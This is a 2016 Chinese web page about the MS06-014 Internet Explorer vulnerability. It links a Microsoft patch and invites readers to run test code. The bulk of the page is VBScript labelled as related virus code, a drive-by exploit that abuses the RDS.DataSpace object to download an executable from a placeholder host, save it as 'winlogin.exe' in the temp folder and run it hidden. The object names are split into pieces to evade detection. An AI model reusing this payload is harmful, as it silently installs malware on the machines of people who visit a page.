发布于 2016-12-01 08:24:20 | 121 次阅读 | 评论: 0 | 来源: 网友投递

这里有新鲜出炉的Javascript教程,程序狗速度看过来!

JavaScript客户端脚本语言

Javascript 是一种由Netscape的LiveScript发展而来的原型化继承的基于对象的动态类型的区分大小写的客户端脚本语言,主要目的是为了解决服务器端语言,比如Perl,遗留的速度问题,为客户提供更流畅的浏览效果。



请执行下面的代码测试您的机器是否存在漏洞: 

[Ctrl+A 全选 注:如需引入外部Js需刷新才能执行]

补丁下载:http://www.microsoft.com/china/technet/Security/bulletin/ms06-014.mspx
相关病毒的vbs代码如下:

on error resume next 
dl = "http://www.xxx.com/xxx.exe" 
Set df = document.createElement("object") 
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" 
str="Microsoft.XMLHTTP" 
Set x = df.CreateObject(str,"") 
a1="Ado" 
a2="db." 
a3="Str" 
a4="eam" 
str1=a1&a2&a3&a4 
str5=str1 
set S = df.createobject(str5,"") 
S.type = 1 
str6="GET" 
x.Open str6, dl, False 
x.Send 
fname1="winlogin.exe" 
set F = df.createobject("Scripting.FileSystemObject","") 
set tmp = F.GetSpecialFolder(2)  
fname1= F.BuildPath(tmp,fname1) 
S.open 
S.write x.responseBody 
S.savetofile fname1,2 
S.close 
set Q = df.createobject("Shell.Application","") 
Q.ShellExecute fname1,"","","open",0


最新网友评论  共有(0)条评论 发布评论 返回顶部

Copyright © 2007-2017 PHPERZ.COM All Rights Reserved   冀ICP备14009818号  版权声明  广告服务